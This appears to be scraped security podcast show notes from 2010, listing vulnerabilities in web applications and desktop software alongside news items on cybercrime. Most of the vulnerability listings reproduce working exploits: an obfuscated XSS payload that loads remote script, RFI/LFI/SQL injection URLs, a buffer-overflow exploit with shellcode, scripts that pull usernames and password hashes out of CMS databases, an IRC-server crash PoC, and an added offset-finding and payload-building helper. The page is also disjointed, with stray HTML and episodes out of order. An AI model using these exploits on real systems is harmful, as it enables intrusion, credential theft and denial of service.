      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      &lt;<img src=\'Dick\' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'&gt;
      </body>
      </html>

    6. Open Web Analytics is subject to multiple Remote File Inclusion vulnerabilities. Version 1.2.3 is affected. PoC URL is available: http://www.sample.com/mw_plugin.php?IP=shell.txt?
    7. MyOWNspace is subject to multiple Local File Inclusion vulnerabilities. Version 8.2 is affected. Example URLs are available: http://www.sample.com/graph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/myowngraph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/showmyownfriends.php?go=../../../../../../../boot.ini%00

    8. DaFun Spirit is subject to a Remote File Inclusion (RFI) vulnerability.  Version 2.2.5 is impacted.  Example URLs are available: http://www.sample.com/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]

      http://www.sample.com/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]

    9. Mini-Stream Ripper is subject to a local stack buffer overflow vulnerability when opening a crafted .smi playlist. Version 3.1.0.8 is affected. Exploit code is available:
      # Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
      # Author: Hazem Mofeed
      # Download: http://www.mini-stream.net/mini-stream-ripper/download/
      # Home: http://hakxer.wordpress.com

      # [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited ..
      # http://www.exploit-db.com/exploits/11607

      # WinExec("calc.exe") followed by ExitProcess, using hard-coded
      # Windows XP SP3 kernel32 addresses (the author's "SP3" note)
      shellcode = (b"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
                   b"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
                   b"\x63\x2e\x65\x78\x65\x00")  # SP3(sh)

      # exploit: 43496 bytes of filler, the author's return address twice
      # (little-endian 0x7C836A08), then the shellcode
      exploit = (b"\x41" * 43496 + b"\x08\x6A\x83\x7C" +
                 b"\x08\x6A\x83\x7C" + shellcode)
      with open("exploit.smi", "wb") as f:
          f.write(exploit)

    10. SiteX CMS is subject to a SQL injection vulnerability in photo.php (albumid parameter). Version 0.7.4 Beta is affected. Exploit code is available:
      <?php
      echo "\n\n###########################################################################\n";
      echo "##                                                                       ##\n";
      echo "## Product: SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit     ##\n";
      echo "## Usage: php.exe sitex.php www.site.com /cmspath/                       ##\n";
      echo "## Require: Magic_quotes = off                                           ##\n";
      echo "## Author: Sc0rpi0n [RUS] (http://scorpion.su)                           ##\n";
      echo "## Special for Antichat (forum.antichat.ru)                              ##\n";
      echo "## Bugs find: Iceangel_, [x60]unu, .:[melkiy]:.                          ##\n";
      echo "##                                                                       ##\n";
      echo "###########################################################################\n\n";
      $host   = $argv[1];
      $path   = $argv[2];
      $script = "photo.php?albumid=";
      // Closes the quoted albumid value and appends a UNION that returns the first
      // user's name and password hash wrapped in ::, ::: and :::: markers (0x3a = ':')
      $sql = urlencode("-1' UNION SELECT 1,concat(0x3a3a,username,0x3a3a3a,password,0x3a3a3a3a),3,4,5,6,7,8 FROM SiteX_Users WHERE -- ");
      $fsock = fsockopen($host, 80);
      $headers  = "GET http://$host$path$script$sql HTTP/1.0\r\n";
      $headers .= "Host: $host\r\n\r\n";
      fwrite($fsock, $headers);
      $response = '';
      while (!feof($fsock))
          $response .= fread($fsock, 1024);
      // Locate the markers in the page; if they are missing the host is not vulnerable
      $pos1 = strpos($response, "::")   or die("## http://$host is not vulnerable or error\n");
      $pos2 = strpos($response, ":::")  or die("## http://$host is not vulnerable or error\n");
      $pos3 = strpos($response, "::::") or die("## http://$host is not vulnerable or error\n");
      $len1 = $pos2 - $pos1;
      $len2 = $pos3 - $pos2;

      $login    = substr($response, $pos1 + 2, $len1 - 2);
      $password = substr($response, $pos2 + 3, $len2 - 3);

      echo "## Host: $argv[1]\n";
      echo "## Login: $login\n";
      echo "## Password: $password\n";
      ?>
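The Mini-Stream exploit in item 9 hard-codes 43496 bytes of filler before the return address. That number is normally found by sending a pattern in which every 4-byte window is unique, reading the value that lands in EIP when the program crashes, and looking that value up in the pattern. The block below is an added example, not the exploit author's code: it generates such a pattern (a de Bruijn sequence over letters and digits, so it stays unique well past 43496 bytes, where the common three-character upper/lower/digit pattern runs out at 20280), recovers the offset from a register value, and then assembles the `[BUFFER] + [RET] + [SHELLCODE]` layout the exploit comment describes. The return address 0x7C836A08 is the one the exploit uses (its bytes `\x08\x6A\x83\x7C` read little-endian); the crash value in the `__main__` demo is constructed.

```python
"""Find the offset of the saved return address with a cyclic pattern, then
lay the buffer out the way the Mini-Stream exploit does.

Added example, not the exploit author's code. The 43496-byte filler length
and the return address 0x7C836A08 come from the exploit above; the pattern,
alphabet and the crash value in __main__ are constructed for the demo.
"""
import string
import struct
from typing import Union

# Upper + lower + digits: 62 symbols, so every 4-byte window is unique within
# 62**4 bytes, comfortably more than the 43496 this exploit needs.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits


def de_bruijn(alphabet: str, n: int, length: int) -> str:
    """Prefix of length `length` of the de Bruijn sequence B(k, n) over
    `alphabet` (FKM algorithm). Every window of n symbols occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if len(out) >= length:  # enough output; stop generating
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:length])


def pattern_create(length: int) -> bytes:
    """What to send in place of the 'A' * 43496 filler while hunting the offset."""
    if length > len(ALPHABET) ** 4:
        raise ValueError("pattern would repeat 4-byte windows")
    return de_bruijn(ALPHABET, 4, length).encode("ascii")


def pattern_offset(value: Union[int, bytes], pattern: bytes) -> int:
    """Offset of the 4 bytes that landed in a register. An int is the value the
    debugger showed (e.g. EIP); the CPU loaded it little-endian, so it is packed
    back into the byte order that sat in memory before searching."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("register value not found in pattern")
    return idx


def build_payload(offset: int, ret: int, shellcode: bytes, filler: bytes = b"A") -> bytes:
    """[BUFFER] + [RET] + [SHELLCODE]: filler up to the saved return address,
    the address packed little-endian, then the shellcode (the original exploit
    repeats RET once more before the shellcode)."""
    return filler * offset + struct.pack("<I", ret) + shellcode


if __name__ == "__main__":
    pat = pattern_create(43496)
    # Constructed crash: pretend the debugger showed EIP holding the pattern bytes at offset 43000
    eip = struct.unpack("<I", pat[43000:43004])[0]
    print("EIP 0x%08x -> offset %d" % (eip, pattern_offset(eip, pat)))
    payload = build_payload(43496, 0x7C836A08, b"\xcc")
    print("bytes at the return slot:", payload[43496:43500].hex())  # 086a837c, as the exploit hard-codes
```

Write `pattern_create(n)` to the .smi file instead of the `A` filler, attach a debugger, open the file, and pass the EIP value to `pattern_offset`; the result is the number that replaces 43496 for a different build, after which `build_payload` produces the final buffer.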

Stories of Interest:
News item 1: http://www.computerworld.com/s/article/9173965/FBI_lists_Top_10_posts_in_cybercriminal_operations?taxonomyId=17
Criminal hacker organizations are operating with increasing corporate-life efficiency, specialization and expertise, according to the FBI.

From a business perspective, these criminal enterprises are highly productive and staffed by dedicated people willing to operate worldwide, around the clock “without holidays, weekends or vacations,” according to Steven Chabinsky, deputy assistant director in the FBI’s cyber division. “As a result, when an opportunity presents itself these criminals can start planning within hours.”

According to the FBI the top 10 positions in cyber criminal organizations are:

1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.
2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.
3. Tech experts, who maintain the criminal enterprise’s IT infrastructure, including servers, encryption technologies, databases, and the like.
4. Hackers, who search for and exploit applications, systems and network vulnerabilities.
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.
10. Organization Leaders, often “people persons” without technical skills. The leaders assemble the team and choose the targets.

News item 2: http://www.computerworld.com/s/article/9174242/Military_warns_of_increasingly_active_cyber_threat_from_China_
On the same day that Google Inc. and the GoDaddy Group Inc. complained about China to a congressional committee, U.S. Navy Admiral Robert Willard appeared before the U.S. House Armed Services Committee with an even stronger warning about cyber-threats posed by China.

Willard’s comments about China received little press attention but were stronger than anything said by either company.

“U.S. military and government networks and computer systems continue to be the target of intrusions that appear to have originated from within the PRC (People’s Republic of China),” said Willard.

He said that most of the intrusions are focused on acquiring data “but the skills being demonstrated would also apply to network attacks.”

Willard testified on the military’s operations in its Pacific command, which he said “faces increasingly active and sophisticated threats to our information and computer infrastructure.”
News item 3: http://www.telegraph.co.uk/news/newstopics/howaboutthat/7532996/Ageing-spies-unable-to-use-the-internet.html
The Security Service is launching an unprecedented round of redundancies to improve the overall level of computer skills among its staff.

Despite an expanding budget, MI5 is laying off employees in order to hire new intelligence officers and support staff with better command of information technology and other “deployable” skills.

The redundancy programme has set tongues wagging in Whitehall, with civil servants in other departments joking about a “James Bond generation” of elderly spies being put out to pasture because they can’t use the internet and don’t understand the world of Twitter or Facebook.

The plan was disclosed by Jonathan Evans, the director-general of MI5. He told a Parliamentary committee that he is concerned that his agency’s overall IT skills are not up to scratch, leading him to get rid of some employees.

News item 4: http://www.kptv.com/news/22964989/detail.html
The theft of a computer from Molalla’s water treatment facility is being considered a federal crime by authorities.  Someone broke into the water plant Saturday night and stole the computer, which was what kept the plant working on auto pilot. Water service to Molalla has not been affected, but workers must operate the plant the old-fashioned way.

“It has to be manually run and also inspected (so) visual checks can be made,” said Marc Howatt, the city’s public works director.

The thieves broke into the water plant through a back window. Once inside, Howatt said, the thief triggered a motion detector and an on-call manager rushed to the facility and found the front door open and one of the computers gone.

The computer contained software that monitored the water pumps, reservoir and chlorine levels.”The software enables ease of operation,” Howatt said. “It allows the operator to log onto a screen and see what’s happening with the plant at any given time during the day.”  The following day, workers found the computer in a pond on the property. City officials said it’s destroyed, but a technician is trying to salvage the hard drive and the costly programming on it.

2010
03.26

InfoSec Daily Podcast

 
ISD Podcast Episode 96 for March 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

  • May 8, 2010 Jeffersonville,  Indiana
  • (No URL for that as of yet)
  • Proceeds will be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability.  Vulnerable code:
      <?php
      ob_start();//;print_r($_GET);
      error_reporting(E_ALL);
      function __autoload($class_name){
          $f=realpath('..').'/classes/'.$class_name.'.php';
          if (file_exists($f))
              require_once $f ;
          else {
              die('File '.$f.' does not exist. Referer: '.(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : 'none').'<br/>');
          }
      }
      Config::init();
      $xmldb=XmlDb::getInstance();
      $selfname=basename($_SERVER['PHP_SELF'],'.php');
      if(isset($_GET['p']) && !empty($_GET['p'])) {
          //$selfname=basename($_GET['p'],'.php');
          $selfname=str_replace('.php','',$_GET['p']);   // the request parameter reaches the include path with only ".php" stripped
          $filepath=dirname(dirname($_SERVER['SCRIPT_FILENAME'])).'/control/'.$selfname.'.php';//echo $selfname;
          if(!file_exists($filepath)) {
              include '../control/defaultcontrol.php';
          }
          else
              include '../control/'.$selfname.'.php';
      }
      Proof of Concept is available: http://www.sample.com/index.php?p=[LFI]

    2. Joomla component com_universal (UWCMS Universal Web CMS) is subject to a Remote File Inclusion (RFI) vulnerability. This affects version 1.0.0.  Vulnerable code (in /includes/config/config.html.php):

      global $mosConfig_absolute_path;
      require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");

      Proof of Concept is available: http://www.sample.com/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

    3. N-13 News is subject to a File Disclosure vulnerability. Example URL is available: http://www.sample.com/modules/login.php?default_login_language={FILE}
    4. CF Image Hosting Script is subject to a File Disclosure vulnerability. Version 1.0 is impacted.  Example URL is available: http://www.sample.com/?img=../{FILE}
    5. Easy-Clanpage is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Easy-Clanpage 2.2 and versions prior to and including Easy-Clanpage 2.0 are vulnerable; other versions may be affected as well.  Example URLs are available: http://www.sample.com/[path]/?section=user&action=details&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
      http://www.sample.com/ecp_version2/?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1

      The following exploit is available:
      #!/usr/bin/env python
      #-*- coding:utf-8 -*-
      import sys, urllib2, getopt

      def out(str):
          sys.stdout.write(str)
          sys.stdout.flush()

      class Exploit:
          charset = "0123456789abcdefABCDEF"
          url = ""
          charn = 1
          id = 1
          table_prefix = ""
          table_field = ""
          passwd = ""
          columns = []
          find_passwd = True

          def __init__(self):
              if len(sys.argv) < 2:
                  print "*****************************************************************************"
                  print "******************** Easy-Clanpage V2.0 Profil Page Hack ********************"
                  print "*****************************************************************************"
                  print "*                Discovered and vulnerability by Easy Laster                *"
                  print "*                             coded by Dr.ChAoS                             *"
                  print "*****************************************************************************"
                  print "* Usage:                                                                    *"
                  print "* python exploit.py [OPTION...] [SWITCH...] <url>                           *"
                  print "*                                                                           *"
                  print "* Example:                                                                  *"
                  print "*                                                                           *"
                  print "* Get the password of the user with id 2:                                   *"
                  print "* python exploit.py -id 2 http://site.de/ecp/                               *"
                  print "*                                                                           *"
                  print "* Get email and username of id 1:                                           *"
                  print "* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *"
                  print "*                                                                           *"
                  print "* Switches:                                                                 *"
                  print "* --nopw                                 Search no password                 *"
                  print "*                                                                           *"
                  print "* Options:                                                                  *"
                  print "* --id=<user id>                         User id                            *"
                  print "* --prefix=<table prefix>                Table prefix of ECP                *"
                  print "* --columns=<max_chars:column_name,...>  Get value of any column you want   *"
                  print "*****************************************************************************"
                  exit()
              opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "columns=", "nopw"])
              for opt in opts:
                  if opt[0] == "--id":
                      self.id = int(opt[1])
                  elif opt[0] == "--prefix":
                      self.table_prefix = opt[1]
                  elif opt[0] == "--columns":
                      for col in opt[1].split(","):
                          max, name = col.split(":")
                          self.columns.append([max, name, ""])
                  elif opt[0] == "--nopw":
                      self.find_passwd = False
              for switch in switches:
                  if switch[:4] == "http":
                      if switch[-1:] == "/":
                          self.url = switch
                      else:
                          self.url = switch + "/"

          def generate_url(self, ascii):
              return self.url + "index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "ecp_user%20WHERE%20userID=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))

          def start(self):
              print "Exploiting..."
              if self.find_passwd:
                  self.password()
              if len(self.columns) > 0:
                  self.read_columns()
              print "All finished!\n"
              print "------ Results ------"
              if len(self.columns) > 0:
                  for v in self.columns:
                      print "Column \"" + v[1] + "\": " + v[2]
              if self.find_passwd:
                  if len(self.passwd) == 32:
                      print "Password: " + self.passwd
                  else:
                      print "Password not found!"
              print "--------------------"

          def read_columns(self):
              end = False
              charrange = [0]
              charrange.extend(range(32, 256))
              for i in range(len(self.columns)):
                  out("Getting value of \"" + self.columns[i][1] + "\": ")
                  self.table_field = self.columns[i][1]
                  for pwc in range(1, int(self.columns[i][0]) + 1):
                      if end == True:
                          break
                      self.charn = pwc
                      end = False
                      for c in charrange:
                          src = urllib2.urlopen(self.generate_url(chr(c))).read()
                          if "<b>Warning</b>:  mysql_result() [" in src:
                              if c == 0:
                                  end = True
                              else:
                                  self.columns[i][2] += chr(c)
                                  out(chr(c))
                              break
                  out("\n")

          def password(self):
              out("Getting password: ")
              self.table_field = "password"
              for pwc in range(1, 33):
                  self.charn = pwc
                  for c in self.charset:
                      src = urllib2.urlopen(self.generate_url(c)).read()
                      if "<b>Warning</b>:  mysql_result() [" in src:
                          self.passwd += c
                          out(c)
                          break
              out("\n")

      exploit = Exploit()
      exploit.start()

    6. JINAIS is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. JINAIS 0.1.8 is vulnerable; other versions may also be affected. Exploit code is available:
      /*
      Jinais IRC Server 0.1.8 - NULL Pointer PoC

      This PoC will disconnect the affected target IRC server using
      a NULL Pointer vulnerability.

      Copyright 2010 Salvatore Fresta aka Drosophila

      This program is free software; you can redistribute it and/or
      modify it under the terms of  the  GNU General Public License
      as published by the  Free Software Foundation; either version
      2 of the License, or (at your option) any later version.

      This program  is  distributed  in the hope  that  it  will be
      useful, but WITHOUT ANY WARRANTY;  without  even the  implied
      warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
      PURPOSE. See the GNU General Public License for more details.

      You should have  received a copy  of  the  GNU General Public
      License along  with  this program;  if not, write to the Free
      Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
      MA 02111-1307 USA

      http://www.gnu.org/licenses/gpl-2.0.txt

      */

      #include <stdio.h>
      #include <string.h>
      #include <getopt.h>
      #include <stdlib.h>
      #include <time.h>
      #ifdef WIN32
      #include <winsock.h>
      #define close closesocket
      #else
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <sys/select.h>   /* select(), fd_set, struct timeval */
      #include <netinet/in.h>
      #include <unistd.h>
      #include <errno.h>
      #include <netdb.h>
      #endif

      #define BUFF_SIZE 256
      #define DEFAULT_PORT 4002

      int socket_connect(char *server, int port);
      char *socket_receive(int sock, int tout);
      int socket_send(int socket, char *buffer, size_t size);
      int socket_close(int socket);

      int main(int argc, char *argv[]) {

          int sd,
              rnd_num,
              len,
              port = DEFAULT_PORT;
          char pkg[BUFF_SIZE],
               *response = NULL,
               *host = NULL;

          if(argc < 2) {
              printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
                     "\nhttp://www.salvatorefresta.net"
                     "\n"
                     "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
              return -1;
          }

          srand(time(NULL));

          host = argv[1];
          if(argc > 2) port = atoi(argv[2]);

          printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
                 "\nhttp://www.salvatorefresta.net"
                 "\n\n[*] Connecting to %s:%d...", host, port);

          sd = socket_connect(host, port);
          if(sd < 0) {
              printf("\n[-] Error on connect!\n\n");
              return -1;
          }

          printf("\n[+] Connection established"
                 "\n[*] Logging in to IRC server...");

      login:

          rnd_num = rand()%100+1;

          /* Register a random nickname; retried below if the server reports a collision. */
          len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
          if(len < 0 || (size_t)len >= sizeof(pkg)) {
              perror("\n[-] Error: snprintf");
              socket_close(sd);
              return -1;
          }

          if(socket_send(sd, pkg, len) < 0) {
              perror("\n[-] Error: socket_send");
              socket_close(sd);
              return -1;
          }

          response = socket_receive(sd, 3);
          if(!response) {
              perror("\n[-] Error: socket_receive");
              socket_close(sd);
              return -1;
          }

          if(strstr(response, "Nickname is already in use")) {
              free(response);
              goto login;
          }
          free(response);

          printf("\n[+] Login successful"
                 "\n[*] Data sending...");

          rnd_num = rand()%100+1;
          len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
          if(len < 0 || (size_t)len >= sizeof(pkg)) {
              perror("\n[-] Error: snprintf");
              socket_close(sd);
              return -1;
          }

          if(socket_send(sd, pkg, len) < 0) {
              perror("\n[-] Error: socket_send");
              socket_close(sd);
              return -1;
          }

          response = socket_receive(sd, 3);
          if(!response) {
              perror("\n[-] Error: socket_receive");
              socket_close(sd);
              return -1;
          }
          free(response);

          socket_close(sd);

          printf("\n[+] Data sent successfully"
                 "\n[+] Connection closed\n\n");

          return 0;

      }

      int socket_connect(char *server, int port) {

          int sd;
          struct sockaddr_in sock;
          struct hostent *host = NULL;

      #ifdef WIN32
          WSADATA wsadata;
          if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
      #endif

          memset(&sock, 0, sizeof(sock));

          if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

          sock.sin_family = AF_INET;
          sock.sin_port = htons(port);

          if(!(host=gethostbyname(server))) return -1;

          sock.sin_addr = *((struct in_addr *)host->h_addr);

          if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;

          return sd;

      }

      /* Read until the peer stops sending for tout seconds (or closes); returns a malloc'd, NUL-terminated buffer. */
      char *socket_receive(int sock, int tout) {

          int ret,
              byte_recv,
              oldpkglen = 0,
              pkglen = 0;
          char *buffer = NULL,
               tmp[128];
          struct timeval timeout;
          fd_set input;

          if(sock < 0) return NULL;

          while (1) {

              FD_ZERO(&input);
              FD_SET(sock, &input);

              if(tout > 0) {
                  timeout.tv_sec  = tout;
                  timeout.tv_usec = 0;
                  ret = select(sock + 1, &input, NULL, NULL, &timeout);
              }
              else
                  ret = select(sock + 1, &input, NULL, NULL, NULL);

              if (!ret) break;
              if (ret < 0) return NULL;

              byte_recv = recv(sock, tmp, sizeof(tmp), 0);

              if(byte_recv < 0) return NULL;

              if(!byte_recv) break;

              oldpkglen = pkglen;
              pkglen += byte_recv;

              buffer = (char *) realloc(buffer, pkglen+1);

              if(!buffer) return NULL;

              memcpy(buffer+oldpkglen, tmp, byte_recv);

          }

          if(buffer) buffer[pkglen] = 0;

          return buffer;

      }

      int socket_send(int socket, char *buffer, size_t size) {

          if(socket < 0) return -1;

          return send(socket, buffer, size, 0) < 0 ? -1 : 0;

      }

      int socket_close(int socket) {

          if(socket < 0) return -1;

          return close(socket) < 0 ? -1 : 0;

      }

    7. New-CMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. New-CMS 1.21 and prior are vulnerable. Example URL is available: http://www.sample.com/index.php?pg=[LFI]
    8. From the Pwn2Own Contest: Microsoft Internet Explorer is subject to multiple unspecified remote code-execution vulnerabilities. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. The vulnerabilities affect Internet Explorer 8; other versions may be vulnerable as well. The researcher responsible for discovering these issues has developed exploit code to trigger the vulnerabilities. This exploit code is not known to be publicly available.
    9. From the Pwn2Own Contest: Apple Safari is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. This vulnerability affects Apple Safari 4 versions running on the Mac OS X platform; other versions may be vulnerable as well. The researcher responsible for discovering this issue has developed exploit code to trigger this vulnerability. This exploit code is not known to be publicly available.
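Items 1, 2 and 7 above share one root cause: a request parameter is spliced into an include path, so "../", a "%00" terminator or a full URL decides what gets loaded. As an added example (not code from the podcast or from any of the listed projects), here is how the same front-controller dispatch looks when the untrusted value is treated as a lookup key rather than a path. The control/ directory and the allowlist of controller names are constructed for the example, and the resolver is written in Python so it can be run and tested offline; the same five checks apply in PHP.

```python
import os
import re
import tempfile
import urllib.parse

# Allowlist of controller names the front controller may include.
# Constructed for this example; the listed projects use their own names.
ALLOWED_CONTROLLERS = frozenset({"defaultcontrol", "login", "news"})

# A controller name is a bare identifier: no slashes, dots or colons, so it
# can never spell a relative path, an absolute path or a remote URL.
NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def make_sample_controls():
    """Create a throwaway control/ directory with one stub file per
    allowlisted controller, so the resolver can be exercised offline."""
    base = tempfile.mkdtemp(prefix="control_")
    for name in ALLOWED_CONTROLLERS:
        with open(os.path.join(base, name + ".php"), "w") as fh:
            fh.write("<?php // constructed stub controller: %s\n" % name)
    return base


def resolve_controller(base_dir, user_value):
    """Map an untrusted ?p= / ?pg= style value to a file inside base_dir.

    Returns the absolute path to include, or None when the value must be
    rejected.  Checks, in order:
      1. decode once and refuse NUL bytes (the %00 truncation trick);
      2. strip only a trailing ".php", as the original dispatch did;
      3. refuse anything that is not a bare identifier, which removes
         "../", absolute paths and "http://..." remote includes;
      4. require the name to be on the allowlist;
      5. confirm the resolved real path still lives under base_dir.
    """
    if not user_value:
        return None
    decoded = urllib.parse.unquote(user_value)
    if "\x00" in decoded:
        return None
    if decoded.endswith(".php"):
        decoded = decoded[:-4]
    if not NAME_RE.match(decoded):
        return None
    if decoded not in ALLOWED_CONTROLLERS:
        return None
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, decoded + ".php"))
    # Containment check: even after symlink resolution the file must be a
    # descendant of the control directory.
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate if os.path.isfile(candidate) else None


def classify(base_dir, values):
    """Return {value: 'include <file>' | 'reject'} for a batch of inputs."""
    result = {}
    for v in values:
        path = resolve_controller(base_dir, v)
        result[v] = "reject" if path is None else "include " + os.path.basename(path)
    return result


if __name__ == "__main__":
    control_dir = make_sample_controls()
    # Constructed probes in the shape of the example URLs above.
    probes = [
        "news", "login.php", "admin",
        "../../../../etc/passwd",
        "..%2F..%2Fproc%2Fself%2Fenviron%00",
        "http://203.0.113.99/remote.txt",
    ]
    for value, verdict in classify(control_dir, probes).items():
        print("%-40s -> %s" % (value, verdict))
```

The allowlist does most of the work; the realpath containment check is there for the day someone widens the allowlist or adds a symlink under control/, and rejecting NUL bytes before any filesystem call covers the "%00" variants listed in several of the items above.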

Stories of Interest:
News item 1: http://www.wired.com/threatlevel/2010/03/tjx-sentencing/
Convicted TJX hacker Albert Gonzalez was sentenced to 20 years in prison on Thursday for leading a gang of cyberthieves who stole more than 90 million credit and debit card numbers from TJX and other retailers.

The sentence for the largest computer-crime case ever prosecuted is the lengthiest ever imposed in the United States for hacking or identity-theft. Gonzalez was also fined $25,000. Restitution, which will likely be in the tens of millions, was not decided Thursday.

Clean-cut, wearing a beige jail uniform and wireframe glasses, the 28-year-old Gonzalez sat motionless at his chair during Thursday’s proceedings, his hands folded in front of him.

Before the sentence was pronounced, Gonzalez told the court he deeply regrets his crimes, and is remorseful for having taken advantage of the personal relationships he’d forged. “Particularly one I had with a certain government agency – that gave me a second chance in life,” said the hacker, who had worked as a paid informant for the Secret Service. “I blame nobody but myself.”

News item 2: http://www.nytimes.com/2010/03/21/world/asia/21grid.html
It came as a surprise this month to Wang Jianwei, a graduate engineering student in Liaoning, China, that he had been described as a potential cyberwarrior before the United States Congress.

Larry M. Wortzel, a military strategist and China specialist, told the House Foreign Affairs Committee on March 10th that it should be concerned because “Chinese researchers at the Institute of Systems Engineering of Dalian University of Technology published a paper on how to attack a small U.S. power grid sub-network in a way that would cause a cascading failure of the entire U.S.”

When reached by telephone, Mr. Wang said he and his professor had indeed published “Cascade-Based Attack Vulnerability on the U.S. Power Grid” in an international journal called Safety Science last spring. But Mr. Wang said he had simply been trying to find ways to enhance the stability of power grids by exploring potential vulnerabilities.

“We usually say ‘attack’ so you can see what would happen,” he said. “My emphasis is on how you can protect this. My goal is to find a solution to make the network safer and better protected.” And independent American scientists who read his paper said it was true: Mr. Wang’s work was a conventional technical exercise that in no way could be used to take down a power grid.

